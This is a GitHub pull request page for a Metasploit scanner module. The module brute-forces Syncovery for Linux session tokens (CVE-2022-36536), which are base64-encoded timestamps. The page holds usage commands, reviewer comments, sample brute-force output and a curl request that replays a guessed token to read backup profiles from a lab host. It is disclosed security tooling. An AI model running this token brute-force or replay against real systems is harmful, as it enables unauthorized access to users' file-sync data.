metasploit-framework
metasploit-framework copied to clipboard
rapid7
Syncovery For Linux - Insecure Session Token Generation (CVE-2022-36536)
This pull request adds the following module for vulnerabilities found in Syncovery for Linux. The vulnerabilities have been communicated to the vendor and are fixed in the current release. CVEs are pending. A vulnerable version can be downloaded from the vendor website: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
CVE-2022-36536: Insecure Session Token Generation
Up to Syncovery v9.48j session tokens are generated insecurely: base64(MM/dd/yyyy HH:mm:ss) This allows the brute-force of valid session tokens
Verification
Download and install a vulnerable version
-
use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536 -
set RHOSTS <TARGET HOSTS> -
run - On success you should get a valid token.
More information can be found on our website: https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
You can automate most of these changes with the -a flag:
rubocop -a <directory or file>
Please update your branch after these have been made, and reach out if you have any problems.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
As @adfoster-r7 commented, I also believe it is possible to take advantage of the scanner framework for this. As an example, this module performs a brute force with only passwords (no username), which would be very similar to what your module is doing. The related login scanner library file can be found here.
So, basically, you will need to create a private credential collection ( Metasploit::Framework::PrivateCredentialCollection.new) without any option and populate the collection using add_private (see its implementation here). Then, you will need to update the existing attempt_login method in the lib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rb to accept both authentication methods (user/password and token) and execute the corresponding logic.
As @adfoster-r7 commented, I also believe it is possible to take advantage of the scanner framework for this. As an example, this module performs a brute force with only passwords (no username), which would be very similar to what your module is doing. The related login scanner library file can be found here.
So, basically, you will need to create a private credential collection (
Metasploit::Framework::PrivateCredentialCollection.new) without any option and populate the collection usingadd_private(see its implementation here). Then, you will need to update the existingattempt_loginmethod in thelib/metasploit/framework/login_scanner/syncovery_file_sync_backup.rbto accept both authentication methods (user/password and token) and execute the corresponding logic.
Thanks for sharing. This was the hint I needed. I will try to implement this
Alright, module is using scanner framework now and should be good to go. Thanks for your help!
Thanks @whoot ! Everything looks good to me now. I tested against Syncovery version 9.47a and verified the token has been correctly guessed. I'll go ahead and land it.
- Example output
msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > run verbose=true rhosts=192.168.2.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.40:8999 - Syncovery 9.47a
[+] The target appears to be vulnerable.
[*] 192.168.2.40:8999 - Starting Brute-Forcer
[-] 192.168.2.40:8999 - INVALID TOKEN: MTIvMTQvMjAyMiAxMToyNjo0Mg==
[-] 192.168.2.40:8999 - INVALID TOKEN: MTIvMTQvMjAyMiAxMToyNjo0MQ==
...
[+] 192.168.2.40:8999 - VALID TOKEN: MTIvMTQvMjAyMiAxMToyNjowMQ==
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- Verification
❯ curl -H "token:MTIvMTQvMjAyMiAxMTo1Njo0NA==" "http://192.168.2.40:8999/profiles.json"
[{ "Rows":[{"id":"0", "Name":"test_profile", "RightPath":"\/tmp\/etc", "LeftPath":"\/etc", "Progress":"6 copied (432.3kB)", "isDisabled":"false", "isLocked":"false", "LastRun":"Today, 12:16:39", "NextRun":"12\/14\/2023, 12:16:37"}] }, {"TotalRows":"1"} ]%
Release Notes
A new login scanner module that brute-forces a valid session token for the Syncovery File Sync & Backup Software Web-GUI. This will work if the default user is already logged in the application. If he does not logout, the token stays valid until next reboot.